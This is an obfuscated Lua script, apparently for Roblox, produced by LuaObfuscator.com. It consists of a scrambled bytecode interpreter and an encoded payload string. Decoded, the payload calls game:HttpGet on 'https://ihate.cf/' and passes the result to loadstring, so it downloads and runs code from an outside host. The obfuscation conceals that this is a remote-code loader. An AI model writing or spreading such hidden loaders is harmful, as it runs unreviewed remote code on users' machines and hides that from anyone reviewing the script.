--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then local v60=0;while true do if (v60==0) then v18=v0(v3(v29,1,1));return "";end end else local v61=v2(v0(v29,16));if v18 then local v74=v5(v61,v18);v18=nil;return v74;else return v61;end end end);local function v19(v30,v31,v32)if v32 then local v62=1253 -(696 + 557);local v63;while true do if (v62==(0 + 0 + 0)) then v63=(v30/((4 -2)^(v31-(200 -(179 + 20)))))%(2^(((v32-(1 -0)) -(v31-(3 -2))) + (1421 -(88 + 1332))));return v63-(v63%1);end end else local v64=0 + 0;local v65;while true do if (v64==(1153 -(727 + 426))) then v65=(2 + (0 -0))^(v31-(1 + 0 + 0));return (((v30%(v65 + v65))>=v65) and ((1005 -(709 + 293)) -2)) or 0;end end end end local function v20()local v37=v1(v15,v17,v17);v17=v17 + 1;return v37;end local function v21()local v38,v39=v1(v15,v17,v17 + (497 -(151 + 344)));v17=v17 + (2 -0);return (v39 * (478 -222)) + v38;end local function v22()local v40,v41,v42,v43=v1(v15,v17,v17 + 1 + 2);v17=v17 + (6 -2);return (v43 * (16777956 -(24 + 106 + 610))) + (v42 * 65536) + (v41 * (188 + 68)) + v40;end local function v23()local v44=0;local v45;local v46;while true do if (v44==0) then v45=v22();v46=v22();v44=1 -(1273 -(228 + 1045));end if (v44==(1 + 0)) then return (( -(2 -0) * v19(v46,19 + 13)) + (1287 -(171 + (2625 -(518 + 992))))) * ((1 + 1)^(v19(v46,48 -27,826 -(521 + 274)) -(1325 -(712 -410)))) * ((((v19(v46,1 + 0 + 0,16 + 4) * ((2 + 0 + 0)^32)) + v45)/((2 + 0)^(864 -(345 + 27 + 440)))) + 1 + 0);end end end local function v24(v33)local v47=0 -0;local v48;local v49;while true do if (v47==(0 -0)) then v48=nil;if  not v33 then v33=v22();if (v33==(0 + 0)) then return "";end end v47=919 -((2098 -1329) + 149);end if (v47==((741 -(566 + 174)) + 1)) then v49={};for v75=1, #v48 do v49[v75]=v2(v1(v3(v48,v75,v75)));end v47=6 -3;end if (v47==(1903 -(903 + 999))) then v48=v3(v15,v17,(v17 + v33) -(1165 -(174 + 990)));v17=v17 + v33;v47=(1483 -(174 + 1179)) -(93 + 35);end if (v47==(2 + 1)) then return v6(v49);end end end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v50=1548 -(262 + 1286);local v51;local v52;local v53;local v54;local v55;local v56;while true do if (v50==(0 -0)) then local v71=0;while true do if (v71~=2) then else v50=1;break;end if (v71==(716 -(543 + 172))) then local v94=0 + 0;while true do if (v94==(0 + 0)) then v53={};v54={v51,v52,nil,v53};v94=1;end if (v94==1) then v71=2;break;end end end if (v71~=0) then else local v95=0;while true do if (1==v95) then v71=2 -1;break;end if (v95==(1714 -(79 + 1635))) then v51={};v52={};v95=1;end end end end end if ((487 -(60 + 425))==v50) then local v72=0;while true do if (v72==(1530 -(5 + 1524))) then for v97=1 -0,v22() do v53[v97]=v22();end return v54;end if (v72~=(1067 -(371 + 696))) then else for v99=1 + 0,v22() do local v100=0;local v101;while true do if (v100~=0) then else v101=v20();if (v19(v101,1,1800 -(832 + 967))~=0) then else local v112=0 + 0;local v113;local v114;local v115;local v116;local v117;while true do if (v112==1) then v115=nil;v116=nil;v112=1813 -(299 + 1512);end if (v112==(2 -0)) then v117=nil;while true do if (v113==0) then v114=0;v115=nil;v113=1 + 0;end if (v113==1) then local v122=0 -0;while true do if (v122~=(1 + 0)) then else v113=2;break;end if (0==v122) then v116=nil;v117=nil;v122=1 + 0;end end end if (v113~=2) then else while true do if (v114==(0 -0)) then local v139=0;local v140;while true do if (v139~=0) then else v140=0;while true do if (v140==1) then v114=1 -0;break;end if ((1613 -(403 + 1210))~=v140) then else v115=v19(v101,2,9 -6);v116=v19(v101,220 -(21 + 195),6);v140=1;end end break;end end end if (v114==2) then local v141=0 + 0;local v142;while true do if (v141~=(264 -(191 + 73))) then else v142=0;while true do if (v142~=(0 -0)) then else local v153=0;while true do if (v153==1) then v142=1;break;end if (v153==(0 -0)) then if (v19(v116,1 + 0,1 + 0)==(1257 -(436 + 820))) then v117[2 + 0]=v56[v117[6 -4]];end if (v19(v116,5 -3,2)==(1 + 0)) then v117[106 -(96 + 7)]=v56[v117[2 + 1]];end v153=1 + 0;end end end if (v142==1) then v114=3;break;end end break;end end end if (v114==(1 -0)) then local v143=0;while true do if (v143==0) then v117={v21(),v21(),nil,nil};if (v115==0) then local v146=988 -(85 + 903);local v147;while true do if (v146==(1153 -(233 + 920))) then v147=1383 -(312 + 1071);while true do if (v147==0) then v117[3]=v21();v117[4]=v21();break;end end break;end end elseif (v115==(903 -(76 + 826))) then v117[3]=v22();elseif (v115==2) then v117[1841 -(408 + 1430)]=v22() -((6 -4)^16);elseif (v115~=(4 -1)) then else local v163=0 -0;local v164;while true do if (v163==0) then v164=0;while true do if (v164==(0 + 0)) then v117[5 -2]=v22() -((7 -5)^(39 -23));v117[9 -5]=v21();break;end end break;end end end v143=1 + 0;end if (v143~=(1 + 0)) then else v114=2;break;end end end if (3==v114) then if (v19(v116,3,3)==(1 -0)) then v117[1 + 3]=v56[v117[467 -(379 + 84)]];end v51[v99]=v117;break;end end break;end end break;end if (v112~=(0 -0)) then else v113=0 -0;v114=nil;v112=1;end end end break;end end end for v102=1,v22() do v52[v102-1]=v27();end v72=1;end end end if (v50==(2 -1)) then local v73=0;while true do if (v73~=(1302 -(188 + 1113))) then else for v104=1,v55 do local v105=0;local v106;local v107;local v108;local v109;while true do if (v105~=2) then else while true do if (v106~=(2 -1)) then else v109=nil;while true do if (v107~=(1834 -(1378 + 455))) then else if (v108==1) then v109=v20()~=(0 + 0);elseif (v108==2) then v109=v23();elseif (v108==(8 -5)) then v109=v24();end v56[v104]=v109;break;end if (v107==0) then local v120=0;while true do if (v120==1) then v107=1;break;end if (v120==(1801 -(1682 + 119))) then v108=v20();v109=nil;v120=1;end end end end break;end if (v106~=(0 + 0)) then else v107=708 -(559 + 149);v108=nil;v106=3 -2;end end break;end if ((1 + 0)==v105) then v108=nil;v109=nil;v105=1129 -(1070 + 57);end if (0==v105) then v106=0;v107=nil;v105=1;end end end v54[3]=v20();v73=2;end if (v73~=2) then else v50=5 -3;break;end if (v73==(0 + 0)) then v55=v22();v56={};v73=1;end end end end end local function v28(v34,v35,v36)local v57=v34[1];local v58=v34[2];local v59=v34[3];return function(...)local v66=1;local v67= -1;local v68={...};local v69=v11("#",...) -1;local function v70()local v77=v57;local v78=Const;local v79=v58;local v80=v59;local v81=v26;local v82={};local v83={};local v84={};for v90=0 -0,v69 do if ((v90>=v80) or ((3979 + 492 + 48)==(835 -466))) then v82[v90-v80]=v68[v90 + (2 -1)];else v84[v90]=v68[v90 + ((1015 -(232 + 32)) -(292 + 458))];end end local v85=(v69-v80) + (1151 -((2848 -1828) + 130));local v86;local v87;while true do local v91=488 -(60 + 428);local v92;local v93;while true do if ((1325==(697 + 628)) and ((0 -0)==v91)) then v92=0 -0;v93=nil;v91=1 -0;end if (((1 + 0)==v91) or ((5706 -(280 + 339 + 127))<(256 -((1249 -(1154 + 88)) + 131)))) then while true do if ((v92==(195 -(19 + 39 + 137))) or ((8071 -5575)>(8490 -5134))) then v93=222 -(27 + 195);while true do if ((v93==(1889 -(1505 + 384))) or ((4126 -(170 + 89))>=(795 + 3613))) then local v118=1439 -(1211 + 228);while true do if ((v118==(0 -0)) or ((2568 + 1057)<=(3020 -(648 + 71 + 206)))) then local v121=0 -0;while true do if ((v121==(190 -(108 + 81))) or ((1219 -901)==(5304 -3743))) then v118=1 + 0;break;end if (((9833 -5426)>=(374 + 3343)) and (((2520 -1123) -(779 + 618))==v121)) then v86=v77[v66];v87=v86[1 -0];v121=159 -(141 + 8 + 9);end end end if (((266 + 2816)>(886 + 1396)) and (v118==(212 -(107 + 104)))) then v93=(716 -(95 + 620)) + (0 -0);break;end end end if (((12461 -9134)>(3485 -(1044 + 241))) and (v93==(4 -(2 + 1)))) then if ((v87<=(1800 -(1265 + 532))) or ((10230 -7400)<=(873 + 396 + 945))) then if ((v87<=(1 -0)) or ((5941 -3547)==(3537 -1586))) then if (((3746 -(356 + 314))<=(22 + 4168)) and (v87==(0 -0))) then v84[v86[1 + 1]]=v86[408 -((1582 -(1254 + 118)) + 195)]~=((1308 -(88 + 53)) -(60 + 1107));else v84[v86[2 + 0]]();end elseif ((v87==((1 + 2) -1)) or ((3622 -(635 + 2 + 0))<=(667 + 306))) then local v124=0 + 0;local v125;local v126;local v127;local v128;local v129;while true do if (((4576 -(11078 -8186))<(2059 + 2611)) and (v124==(5 -3))) then v129=nil;while true do if ((v125==(0 + 0 + 0)) or ((5971 -3968)==((1488 + 626) -(181 + 276)))) then local v148=0 -0;while true do if (((1830 -(149 + 466))==(448 + 767)) and ((0 -0)==v148)) then v126=v86[2 -0];v127,v128=v81(v84[v126](v12(v84,v126 + (1077 -(159 + 917)),v86[1019 -(393 + 623)])));v148=2 -1;end if ((v148==(1 + 0)) or ((21 + 626)>(1112 + 1316))) then v125=(2 -0) -1;break;end end end if ((v125==(2 + 0 + 0)) or ((2976 -(230 + 1356))>(4243 + 314))) then for v154=v126,v67 do local v155=0 + 0;while true do if ((v155==(0 + 0 + 0)) or ((853 + 752)==(9842 -5020))) then v129=v129 + 1 + 0;v84[v154]=v127[v129];break;end end end break;end if ((v125==(613 -(55 + 557))) or ((8731 -5595)<=(2747 + 180))) then local v149=1207 -(540 + 667);while true do if (((2315 -(226 + 104))>=527) and (v149==(2 -(1 + 0)))) then v125=2;break;end if ((v149==((0 -0) -0)) or ((1504 + 2277)<=(4235 -(2693 -(747 + 1113))))) then v67=(v128 + v126) -(186 -(49 + 136));v129=1258 -(781 + (700 -(169 + 54)));v149=1;end end end end break;end if (((2177 + 1193)>(2563 -(401 + 409))) and (v124==(1 + 0))) then v127=nil;v128=nil;v124=2 + 0;end if ((v124==0) or ((1582 -(833 + 174))>=(2118 -(552 + 227)))) then v125=0 + 0;v126=nil;v124=1 -0;end end else v84[v86[4 -2]]=v86[3 -0];end elseif ((1210<(4684 -(226 + 1272))) and (v87<=5)) then if (((1215 -(16 + 36))<=3096) and (v87==(6 -2))) then v84[v86[1 + 1]]=v36[v86[14 -11]];else local v132=0 + 0;local v133;local v134;while true do if ((v132==(2 -(1169 -(436 + 732)))) or ((6429 -4682)<=(953 + (103 -69)))) then while true do if ((v133==(0 -0)) or ((1268 + (779 -491))>=(8862 -4101))) then v134=v86[1 + (1 -0)];v84[v134]=v84[v134](v12(v84,v134 + 1 + (0 -0),v67));break;end end break;end if ((v132==(0 -(0 + 0))) or ((2685 -1129)==((2309 -(193 + 233)) + 3112))) then v133=1491 -(1357 + 134);v134=nil;v132=1;end end end elseif (((6276 -3828)>(1006 + 5)) and (v87==(16 -10))) then local v135=0 + 0;local v136;local v137;local v138;while true do if (((8773 -6245)<=(9075 -4893)) and ((1144 -(305 + 838))==v135)) then v138=nil;while true do if ((v136==(1096 -(499 + 596))) or ((143 + 3093)>=(5161 -(996 + 201)))) then v84[v137 + 1]=v138;v84[v137]=v138[v86[7 -3]];break;end if ((v136==(1079 -(896 + 183))) or ((2704 -(386 + 152))>=(4575 -(184 + 154)))) then v137=v86[1 + 1];v138=v84[v86[2 + 1]];v136=115 -(83 + (64 -33));end end break;end if (((3435 -(897 + 968))==(2672 -(5 + 1097))) and (v135==0)) then v136=1406 -(60 + 128 + 1218);v137=nil;v135=2 -1;end end else do return;end end v66=v66 + (2 -(1 + 0));break;end end break;end end break;end end end end A,B=v26(v10(v70));if  not A[1] then local v88=0;local v89;while true do if (v88==0) then v89=v34[4][v66] or "?";error("Script error at ["   .. v89   .. "]:"   .. A[2]);break;end end else return v12(A,2,B);end end;end return v28(v27(),{},v16)();end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403113O00682O7470733A2O2F69686174652E63662F00093O0012043O00013O001204000100023O002006000100010003001203000300046O000400014O0002000100044O00055O00022O00013O000100012O00073O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v8());end
